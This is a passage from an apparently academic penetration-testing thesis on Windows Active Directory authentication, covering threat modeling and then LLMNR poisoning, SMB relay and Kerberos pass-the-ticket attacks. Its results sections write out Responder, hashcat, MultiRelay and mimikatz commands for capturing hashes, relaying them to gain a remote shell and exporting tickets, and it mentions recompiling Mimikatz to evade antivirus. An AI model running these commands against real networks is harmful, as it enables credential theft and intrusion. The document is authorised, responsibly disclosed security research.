It is possible to compile Mimikatz from the source code which makes it possible to alter it to change its signature. This can in most cases circumvent traditional signature-based anti-virus programs [46].

Responder

Responder [47] is an open source tool that can be used as a poisoner for many different protocols including LLMNR. This will be used in Section 5.3.1 where LLMNR poisoning will be described in more detail. Additional tools from a popular fork of Responder [48] will be used, mainly RunFinger.py to finger- print servers vulnerable to SMB relay attacks and MultiRelay.py to perform this attack.

Hashcat

Hashcat [18] is a password cracking suite that allows an attacker to use different password cracking methods to reverse password hashes. A wide variety

(42)

of hashes are supported [25] and different methods can be used such as brute- force and dictionary attacks (see Section 2.3).

5.2 Threat Modeling Phase

The first phase of the thesis was threat modeling and included the first four penetration testing phases presented in Chapter 4.

The goal of the threat modeling phase was to gather as much information as possible to be able to create an accurate model of the system. It was also of interest to identify what the assets in the system were. What assets does the company want to protect and what assets are the most interesting for an attacker.

5.2.1 Intelligence Gathering

To successfully create a good threat model, it was important to have a good understanding of how the system was designed and how it was used. The system was complex and hard to grasp and for that reason, the first step was to conduct a series of semi-structured interviews with employees that knew about the architecture, code, and reasoning for the system. The questions asked were:

1. What part of the system do you know about?

2. What can you tell about the architecture?

3. What part of the system do you think is the most vulnerable?

4. Is there any documentation?

Since the system was overwhelming, all guidance from developers to product owners was appreciated. Meetings were booked to get an overview of the system in the beginning and then getting more and more detailed about protocols and various system components.

Reconnaissance was also done alongside the interviews to map the system.

Port scans using Nmap, Bloodhound scanning, enumeration scripts, and vulnerability scanners were used to get an overview of the system and to identify potential software that could be vulnerable.

(43)

5.2.2 Building the Model

To get a clear picture of the infrastructure and to get an idea of where to start, a Threat Model was generated in Microsoft Threat Modeling Tool [49]. The tool allows the user to create a model of a system, including trust boundaries, data communication and then generate a report of vulnerabilities. The model created in Microsoft Threat Modeling Tool is presented in Figure 5.3.

Figure 5.3: Threat model of the system modeled in Threat Modeling Tool

5.2.3 Validating the Model

A first version of the model was presented to the security architect at the company. Comments were given on a few areas that were initially perceived wrong.

This was corrected in an iterative process.

A very primitive tool used for validating the model was a card game called Elevation of Privilege [50] by Adam Shostack and Microsoft [39]. This game helped to find vulnerabilities that correspond to the six security threat categories in STRIDE [38]. The objective of the game is to create the threat model and to find new vulnerabilities that no one has thought of before. By taking turns, picking cards, the players need to figure out if the threat presented on the card affects the system. A playing card from Elevation of Privilege is presented in Figure 5.4.

(44)

Figure 5.4: A playing card from the Elevation of Privilege game [39]

5.2.4 Threat Enumeration

After threat modeling, the system, a wide variety of threats were found. To narrow the scope, a more specific area of authentication in the Windows domain was chosen. Possible threats to the Windows Active Directory and authentication methods were researched to test. The results from testing the threats on the test system will be presented in Chapter 7.

5.3 Exploitation Phase

The exploitation phase was primarily done from an attacker host that was running Kali Linux as described in Section 5.1.1. Various tools were used to find vulnerabilities and to exploit them. This section will present three methods that were used and how they work. The results will be presented in Chapter 7.

(45)

5.3.1 LLMNR Poisoning

Link-Local Multicast Name Resolution (LLMNR) is a Windows component to identify services using multicast. This means that when the primary DNS server does not find an entry, the host broadcasts a query to find the service.

The service with the name will in theory respond, but in practice, an attacker can be the first one to reply to the request and pretend to be the service. The host trusts the attacker and sends its NTLMv2 hash to the attacker that can crack the hash offline. The attack is presented in Figure 5.5 and can be summarized as follows:

1. The victim machine tries to connect to a file system on the network that does not exist \\test

2. The victim queries the DNS server and gets the reply that the DNS server does not know the host

3. The victim broadcasts on the network if the location of \\test is known 4. The attacker responds that it is \\test

5. The victim believes the reply and send the username and password hash (NTLMv2) to the attacker.

6. The attacker crack the hash to recover the password

Attacker

Victim DNS Server

1. Connect to \\test

2. Unknown Server

3. Who is \\test

4. I am \\test 5. Here is my password hash

Figure 5.5: LLMNR poisoning

For this attack, the tool Responder.py presented in Section 5.1.2 was used.

(46)

5.3.2 SMB Relay

The SMB relay attack is a pass the hash attack where the attacker can get access to a resource without knowing the password of a user. This is arguably more serious than the LLMNR poisoning attack where only hashes where leaked.

For the SMB relay attack to work, the attacker must be able to get a valid hash and to forward it to a vulnerable computer. This can be done in two ways.

First, the method presented in Section 5.3.1 provided the attacker with a valid hash. Another method not dependant on LLMNR-poisoning is by acting as a Man-In-The-Middle. The attack is shown in Figure 5.6 and can be described as follows:

1. The victim computer wants to log in to a target server 2. The target responds with a challenge

3. The victim uses challenge-response schemes described in Section 3.2.1 and sends back a response

4. The target authenticates the victim

5. The attacker acts as a MITM and forwards the previous messages and gains access to the target machine instead of the victim

For this attack the tool MultiRelay presented in Section 5.1.2 was used to relay the hash to a vulnerable server.

5.3.3 Kerberos Pass the Ticket

Kerberos is the successor to challenge-response schemes and is the default authentication method in Microsoft AD. Kerberos is a ticket-based SSO authentication method and does not handle any password hashes. In contrast to the SMB relay attack previously described, Kerberos is vulnerable to other types of attacks.

One attack that will be presented is a pass-the-ticket attack that allows an attacker to move laterally in the system by extracting Kerberos tickets from other accounts. The attack works by extracting the TGT-ticket from the LSASS memory on a compromised computer. It only works if the attacker already has local administrative privileges on a computer and a user remotely con- nects to it. This can be done with tools like Mimikatz (see Section 5.1.2),

(47)

Victim Attacker Target server

1a. Connect to Server

1b. Connect to Server

2b. Challenge

4b. Access Denied

3b. Response 3a. Response

2a. Challenge

4a. Access Granted

Figure 5.6: SMB relay attack

Kekeo or Rubeus. Rubeus can even monitor the Kerberos login event 4624 and notify the attacker when a new user has logged in to the computer [51].

The TGT-ticket can now be forwarded to access the resources of the victim.

Tickets have a relatively short life span compared to passwords. Tickets are usually valid for 10 hours, but in the case of this system, the life span was much longer as it will be presented in Section 7.4.

5.4 Reporting

All found vulnerabilities were reported to the company using responsible disclosure as presented in Section 2.4.1. The company was given enough time to resolve the found vulnerabilities before it was published in this thesis. The reported vulnerabilities are anonymized to protect the company and its product.

A presentation was given to the company where the findings were presented to interested coworkers.

(48)

Threat Modeling Results

During the threat modeling phase, the security of the system was assessed as a whole. A data-flow diagram as shown in Figure 5.3 was created for the system and for the separate servers. Along with the diagrams, a STRIDE analysis was conducted to enumerate threats in the system. Some of the threats are shown in Table 6.1, the focus area of authentication was chosen after these findings.

36

(49)

CHAPTER 6. THREAT MODELING RESULTS 37

Type Threats

Spoofing

• Spoof a server

• Spoof user by using its Kerberos keys Tampering

• Alter packages in transit between servers Repudiation

• Wipe local logs

• No backup/centralized logging server

• Possibility to remove logs for login application.

Information Disclosure

• MITM attack between two servers leaks information about communication

• Leakage of system settings

• Leakage of encryption keys or passwords Denial of Service

• Crash any of the services

• AD becomes unavailable and no one can be authenti- cated

Elevation of Privilege

• Pass the hash possibilities

• Sniffing hashes and cracking them for credentials

• Users with too many privileges

Table 6.1: Vulnerability enumeration of the system using STRIDE

(50)

Exploitation Results

This chapter will present the findings from the exploitation phase of the conducted penetration test on the system. Section 7.1 will present findings about the domain administrator account. Next, the results of three types of attacks presented in Section 5.3 will follow. Section 7.2 will present a LLMNR poisoning attack. Section 7.3 will present a SMB relay attack and lastly Section 7.4 will present a Kerberos pass-the-hash attack.

7.1 Domain Administrator

The domain administrator account was configured in a way that allowed the user to log in to every machine on the network. From an administrative point of view, this seems like a convenient way to administer workstations and servers in the domain, but it could lead to privilege escalation.

An attacker could already have compromised a computer and a user that has local administrative rights. If the domain administrator decides to remotely connect to this workstation, the attacker can exfiltrate tickets for the domain administrator account from memory.

This method does not only work for the domain administrator, but for any user that has more privileges than the attacker. By gradually gaining more privilege (following the graph from Bloodhound in Figure 5.2), the attacker can get closer to its target.

38

(51)

CHAPTER 7. EXPLOITATION RESULTS 39

7.2 LLMNR Poisoning

Link-Local Multicast Name Resolution (LLMNR) poisoning was possible on the target system to extract the NTLMv2-SSP hash for a user. This was done by using Responder with the command presented in Listing 7.1.

1 $ p y t h o n R e s p o n d e r . py - I e t h 0

Listing 7.1: LLMNR using Responder

This started a LLMNR poisoner that waits for LLMNR requests on the network. When a user on the network tries to access a network resource that does not exist, it broadcasts LLMNR that Responder poisons to retrieve the NTLM hash of the user. If weak, the hash can be cracked offline by using common tools such as Hashcat.

Figure 7.1: Output from LLMNR poisoning using Responder

Password Cracking

The gathered hashes was cracked using the password cracking software Hash- cat. As described in Section 2.3, a wide variety of methods can be used such

(52)

as bruteforce, dictionary or rainbow table attacks. A dictionary attack using Hashcat was performed with the command in Listing 7.2.

1 $ h a s h c a t - m 5 6 0 0 l l m n r - h a s h . t x t ~/ d i c t i o n a r y . t x t

Listing 7.2: Hashcat NTLM cracking

The hash of the user was cracked using this method, but cracking hashes can be time-consuming and not a reliable way to gain access. Another attack called SMB relay is presented in the next section where cracking the hash is not necessary.

7.3 SMB Relay

It was discovered that one server in the system had SMBv1 enabled with SMB signing turned off. These conditions enables an attacker to use a pass-the-hash attack called SMB relaying. With a script called RunFinger.py [48] (Listing 7.3) we identify vulnerable hosts shown in Figure 7.2. Here we see that the machine with IP 192.168.109.23 is exposed to this attack.

Figure 7.2: Output from RunFinger.py

1 $ p y t h o n R u n F i n g e r . py - i 1 9 2 . 1 6 8 . 1 0 9 . 0 / 2 4

(53)

CHAPTER 7. EXPLOITATION RESULTS 41

1 $ p y t h o n R e s p o n d e r . py - I e t h 0

2 $ p y t h o n M u l t i R e l a y . py - t 1 9 2 . 1 6 8 . 1 0 9 . 2 3 - u A L L

Listing 7.4: SMB Relay

Listing 7.3: Identifying SMB relay targets

This attack required two steps. First starting the Responder as it was done in Section 7.2. Next MultiRelay.py [48] was started targeting the exposed server, passing all user hashes to it (Listing 7.4). A user that tries to connect to a server that does not exist, leaks the users NTLM hash, that gets forwarded to the exposed server. Due to the fact that SMB signing is turned off, the exposed server does not check where the authentication request came from.

The attacker now has a remote shell to the exposed server. In this case, we don’t have to crack the hash.

7.4 Kerberos

In the Active Directory configuration, bad Kerberos configuration was found as shown in Table 7.1. The values in question were:

• Maximum lifetime for service ticket

• Maximum lifetime for user ticket

• Maximum lifetime for user ticket renewal

These values were set to 86400 minutes (60 days), 1440 hours (60 days) and 9125 days respectively. The recommended values from Microsoft are 600 minutes (10 hours), 10 hours and 7 days [52]. This is quite serious as an attacker could get hold of the tickets and use them for a very long time.

If the scenario happens that is described in Section 7.1, an attacker could using tools such as Mimikatz exfiltrate credentials or the Kerberos tickets for a more privileged user if this user opens a session on a compromised computer. Using Mimikatz (see Section 5.1.2), the attacker can get the Kerberos tickets from the LSASS memory. With the tickets, the attacker can do a pass-the-ticket

(54)

Policy Value Recommended Value Lifetime for service ticket 86400 minutes 600 minutes

Lifetime for user ticket 1440 hours 10 hours Lifetime for user ticket renewal 9125 days 7 days

Table 7.1: Vulnerable Kerberos configuration

attack and forward the tickets. Due to the fact that the tickets are leased for such a long time, the attacker can for a long time have access to resources.

On the system it was possible to exfiltrate the domain administrator tickets in the case that the user logged in on a compromised computer. Mimikatz was used with the commands in Listing 7.5.

1 $ m i m i k a t z # s e k u r l s a :: t i c k e t s / e x p o r t 2 $ m i m i k a t z # k e r b e r o s :: p t t < t i c k e t >

Listing 7.5: Kerberos pass-the-ticket using mimikatz

Vulnerability Assessment of Authentication Methods in a Large-Scale Computer System

Vulnerability Assessment of

Authentication Methods in a Large- Scale Computer System

DAVIS FREIMANIS

Vulnerability Assessment of Authentication Methods in a Large-Scale Computer

System

DAVIS FREIMANIS

Abstract

Sammanfattning

Contents

Chapter 1 Introduction

1.1 Problem Statement

1.1.1 Research Question

1.1.2 Hypothesis

1.2 Goal of the Thesis

1.3 Scope

1.4 Outline

Chapter 2 Theory

2.1 Information Security

2.1.1 Confidentiality

2.1.2 Integrity

2.1.3 Availability

2.1.4 Authenticity

2.1.5 Accountability

2.2 Cryptography

2.2.1 Symmetric Cryptography

Alice Bob

2.2.2 Public-Key Cryptography

Alice Bob

2.2.3 Hash Functions

2.2.4 Message Authentication Code

2.3 Password Cracking

2.3.1 Brute-force

2.3.2 Dictionary Attacks

2.3.3 Rainbow Tables

2.3.4 Hybrid Attacks

2.3.5 Password Cracking Defences

2.4 Vulnerability Disclosure

2.4.1 Responsible Disclosure

2.4.2 Full Disclosure

Windows Authentication

3.1 Active Directory

3.2 Windows Authentication

Client Server

3.2.1 Challenge-Response

3.2.2 Kerberos

Chapter 4

Penetration Testing

4.1 Pre-Engagement Interactions

4.2 Intelligence Gathering

4.3 Threat Modeling

4.4 Vulnerability Analysis

4.5 Exploitation

4.6 Post Exploitation

4.7 Reporting

Methods

5.1 Target System

5.1.1 Hacking Machine

5.1.2 Tools

5.2 Threat Modeling Phase

5.2.1 Intelligence Gathering

5.2.2 Building the Model

5.2.3 Validating the Model

5.2.4 Threat Enumeration

5.3 Exploitation Phase

5.3.1 LLMNR Poisoning

5.3.2 SMB Relay

5.3.3 Kerberos Pass the Ticket

5.4 Reporting

Threat Modeling Results

Exploitation Results

7.1 Domain Administrator

7.2 LLMNR Poisoning

7.3 SMB Relay

7.4 Kerberos